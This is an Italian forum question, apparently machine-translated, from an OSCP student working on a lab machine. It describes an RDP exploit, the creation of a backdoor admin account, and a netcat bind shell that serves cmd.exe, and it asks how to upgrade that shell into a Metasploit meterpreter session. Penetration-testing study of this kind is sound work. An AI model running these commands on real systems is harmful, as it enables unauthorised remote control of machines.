Sto provando da ore e non riesco a fare qualcosa che dovrebbe essere semplice!
Ho una casella w / admin (prendendo OSCP - niente di illegale). Ho usato un exploit RDP, ho ottenuto una shell, ho aggiunto un utente, ho messo un utente nel gruppo degli amministratori e mentre mi trovo attualmente sono su un rdesktop con un amministratore.
Dato - TARGET - 192.168.1.200, ho una shell di amministrazione e accesso a rdesktop. Ho caricato nc.exe
KALI - La mia macchina - 192.168.1.100.
Quello che sto cercando di fare è aprire una porta LISTENING sul TARGET ... c: \ nc -lvp 9999 -e c: \ windows \ system32 \ cmd.exe
... connettersi a quella porta aperta dalla mia casella KALI mentre si utilizza il framework metasploit. Posso collegarmi usando nc 192.168.1.200 9999, ma non posso fare quella connessione una sessione di metasploit.
Quindi trasforma questa connessione in una sessione meterpreter usando postale / Multi / gestire / shell_to_meterpreter
Grazie!